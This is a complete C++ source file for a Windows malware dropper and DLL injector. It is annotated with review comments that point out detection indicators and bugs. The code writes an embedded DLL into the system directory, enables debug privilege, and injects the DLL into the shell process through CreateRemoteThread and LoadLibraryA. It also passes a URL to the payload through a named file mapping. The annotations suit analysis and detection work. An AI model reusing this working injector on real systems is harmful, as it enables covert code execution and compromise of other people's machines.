// server.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
// Forward declarations; both are defined below WinMain.
bool EnableDebugPriv( char *Name);// enable the named privilege on this process token
bool InjectDll(char *ZiDllPath, DWORD Pid);// remote-thread DLL load into process Pid
// Entry point of a self-contained dropper/injector. What the visible code does:
//  1. single-instance check through the named mutex "fpx_2005_down";
//  2. publishes a URL string through the named file mapping "myfile"
//     (presumably read by the dropped DLL - its code is not on this page);
//  3. writes the embedded resource (name "dll", type "server") to
//     <system directory>\ssdll.dll;
//  4. injects that DLL into the process owning the "ProgMan" window, which is
//     normally the shell (explorer.exe) on the Windows versions this targets.
// Returns 1 when InjectDll succeeds, 0 on any early exit. The mutex name, the
// mapping name, the dropped file name and the cross-process thread created by
// InjectDll are the host-based indicators this sample exposes.
// hInstance / hPrevInstance / lpCmdLine / nCmdShow are unused.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// Mutual exclusion: the mutex handle is never closed, so the name stays
// owned for the lifetime of this process and a second copy exits at once.
HANDLE h=CreateMutex(NULL,FALSE,"fpx_2005_down");
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
return 0;
}
// The URL and the DLL communicate through a file mapping. The value here is
// a 128-character placeholder (all 'f'); the buffer is MAX_PATH so it fits
// the mapping created below.
char url[MAX_PATH]="http://fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff";
HANDLE hmap=NULL;LPTSTR lp;
// (HANDLE)0xFFFFFFFF is INVALID_HANDLE_VALUE: a pagefile-backed section, not
// a file on disk. Named "myfile", MAX_PATH bytes, readable by any process
// in the session that opens that name.
hmap=CreateFileMapping((HANDLE)0xFFFFFFFF,NULL,PAGE_READWRITE,0,MAX_PATH,"myfile");
// Neither hmap nor lp is checked for NULL; a failed mapping would make the
// strcpy below write through a null pointer.
lp=(LPTSTR)MapViewOfFile(hmap,FILE_MAP_ALL_ACCESS,0,0,0);
strcpy(lp,url);
UnmapViewOfFile(lp);
// hmap is intentionally left open so the section survives the unmapped view.
char DllPath1[MAX_PATH];
DWORD dwWritten;
// Drop target: <system directory>\ssdll.dll. GetSystemDirectory's return
// value is not checked.
GetSystemDirectory(DllPath1,MAX_PATH);
strcat(DllPath1,"\\ssdll.dll");
// The payload DLL is embedded as a resource named "dll" of type "server".
HRSRC hResInfo=FindResource(NULL,"dll","server");
DWORD dwsize=SizeofResource(NULL,hResInfo);
HGLOBAL hResData=LoadResource(NULL,hResInfo);
HANDLE hfile=CreateFile(DllPath1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
// NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE, not NULL,
// so this test never fires and a failed open falls through to WriteFile.
if(hfile==NULL)
return 0;
// Raw resource bytes are written as-is; dwWritten is never compared to dwsize.
WriteFile(hfile,(LPCVOID)LockResource(hResData),dwsize,&dwWritten,NULL);
CloseHandle(hfile);
DWORD Pid;
// Inject into the target process.
// Earlier variant targeted the Internet Explorer frame window:
// HWND hWinPro=FindWindow("IEFrame",NULL);
// The current code resolves the "ProgMan" (Program Manager) window, i.e. the
// shell desktop window, so Pid becomes the shell process when it exists.
HWND hWinPro=::FindWindow("ProgMan",NULL);
// Pid stays uninitialised if the window was not found (hWinPro == NULL).
GetWindowThreadProcessId(hWinPro,&Pid);
if(!InjectDll(DllPath1,Pid))
{
return 0;
}
return 1;
}
//---------------------------
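// Enables the named privilege (the caller passes SE_DEBUG_NAME) on the
// current process token.
// Name: privilege name string for LookupPrivilegeValue; must be non-null.
// Returns true when AdjustTokenPrivileges reported success, false when any
// of the three token calls failed.
// Caveat kept from the original contract: AdjustTokenPrivileges returns TRUE
// even when the privilege is not held by the token (and therefore was not
// enabled), so a true result does not prove the privilege is active.
// Enabling SeDebugPrivilege is itself an auditable token-adjustment event.
// Fix: the token handle was leaked on every path; it is now always closed.
bool EnableDebugPriv( char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;
if(!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
// OpenProcessToken error: nothing acquired yet
return false;
}
if(!LookupPrivilegeValue(NULL,Name,&Luid))
{
// LookupPrivilegeValue error (unknown privilege name)
CloseHandle(hToken);
return false;
}
// Single-privilege adjustment; the previous state is not requested.
tp.PrivilegeCount=1;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid=Luid;
BOOL adjusted=AdjustTokenPrivileges(hToken,
0,
&tp,
sizeof(TOKEN_PRIVILEGES),
NULL,
NULL);
// The token is no longer needed whatever the outcome.
CloseHandle(hToken);
if(!adjusted)
{
// AdjustTokenPrivileges error
return false;
}
return true;
}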
// Loads the DLL at ZiDllPath into process Pid with the remote-thread pattern
// visible below: OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
// CreateRemoteThread(LoadLibraryA) -> CreateRemoteThread(FreeLibrary).
// Because the module is freed again as soon as the load thread has finished,
// presumably everything the DLL does happens in DllMain (or in something
// DllMain starts) - the DLL itself is not on this page.
// ZiDllPath: NUL-terminated path, copied into a MAX_PATH buffer (unbounded).
// Pid: target process id (from GetWindowThreadProcessId in WinMain).
// Returns false at the first failing API call, leaking whatever handles or
// remote memory were acquired before it; TRUE when the whole sequence ran.
// From a detection standpoint this is the textbook sequence that process-
// access telemetry flags: a cross-process handle with VM_WRITE|CREATE_THREAD,
// an RWX private allocation in the target, and a remote thread whose start
// address is kernel32!LoadLibraryA.
bool InjectDll(char *ZiDllPath, DWORD Pid)
{
DWORD hLibModule;// exit code of the remote thread = HMODULE returned by LoadLibraryA (32-bit)
HANDLE hRemoteProcess;// process handle
void *pDllName=0;// remote buffer that receives the DLL path
PTHREAD_START_ROUTINE pfnAddr;
// Resolved in this process and reused in the target; relies on kernel32
// being mapped at the same base in every process of the same bitness.
HMODULE hKernel32=GetModuleHandle(TEXT("Kernel32"));
char DllPath[MAX_PATH];
// Unbounded copy: a ZiDllPath longer than MAX_PATH-1 overflows DllPath.
strcpy(DllPath,ZiDllPath);
// Size of the remote buffer: the whole MAX_PATH array, not strlen()+1.
const DWORD THREADSIZE=sizeof(DllPath);
if(!EnableDebugPriv(SE_DEBUG_NAME))
{
// privilege adjustment failed
return false;
}
// hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS,false,Pid); also works
// Reduced access mask for the calls that follow; handle is not inheritable.
if((
hRemoteProcess=OpenProcess(
PROCESS_CREATE_THREAD|
PROCESS_VM_OPERATION|
PROCESS_VM_WRITE|
PROCESS_VM_READ|
PROCESS_QUERY_INFORMATION,
false,
Pid)
)==NULL)
{
// OpenProcess() error
return false;
}
// The buffer only ever holds a path string, yet it is committed
// PAGE_EXECUTE_READWRITE; RWX private memory in a foreign process is a
// common memory-scanner indicator.
if((pDllName=::VirtualAllocEx(hRemoteProcess,
0,
THREADSIZE,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE))
==NULL)
{
// VirtualAllocEx error (hRemoteProcess is leaked on this path)
return false;
}
if(!::WriteProcessMemory(hRemoteProcess,
pDllName,
( void *)DllPath,
THREADSIZE,
NULL))
{
// WriteProcessMemory error (remote allocation and handle are leaked)
return false;
}
// Resolve the entry address of LoadLibraryA.
if((pfnAddr=(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32,"LoadLibraryA"))
==NULL)
{
// GetProcAddress error
return false;
}
HANDLE hRemoteThread;
DWORD ThreadId;
// Thread entry = LoadLibraryA, argument = the remote copy of the path, so the
// target process loads the DLL and runs its DllMain on this thread.
hRemoteThread=::CreateRemoteThread
(hRemoteProcess,
NULL,
0,
pfnAddr,
pDllName,
0,
&ThreadId);
if(hRemoteThread==NULL)
{
// CreateRemoteThread error
return false;
}
// Original author's note: "without the Sleep the program closes; the wait
// time here is not written well". The fixed 10 s Sleep is redundant with
// the INFINITE wait that follows it.
Sleep(10000);
WaitForSingleObject(hRemoteThread,INFINITE);
// The thread exit code is LoadLibraryA's HMODULE; only 32 bits are kept,
// so this part of the code is 32-bit only.
GetExitCodeThread(hRemoteThread,&hLibModule);
// Cleanup of the DllPath / THREADSIZE resources in the target.
CloseHandle(hRemoteThread);
// NOTE(review): with MEM_RELEASE the size argument must be 0 per the
// VirtualFreeEx contract; the return value is not checked, so a failure
// here leaves the remote buffer allocated.
VirtualFreeEx(hRemoteProcess,pDllName,THREADSIZE,MEM_RELEASE);
// Second remote thread: FreeLibrary(hLibModule) unloads the module again.
hRemoteThread=CreateRemoteThread(hRemoteProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32,"FreeLibrary"),
(void *)hLibModule,
0,NULL);
// This second thread handle is not NULL-checked before it is waited on.
WaitForSingleObject(hRemoteThread,INFINITE);
GetExitCodeThread( hRemoteThread, &hLibModule );
CloseHandle(hRemoteThread);
CloseHandle(hRemoteProcess );
return TRUE;
}
//-------------------------------------------------------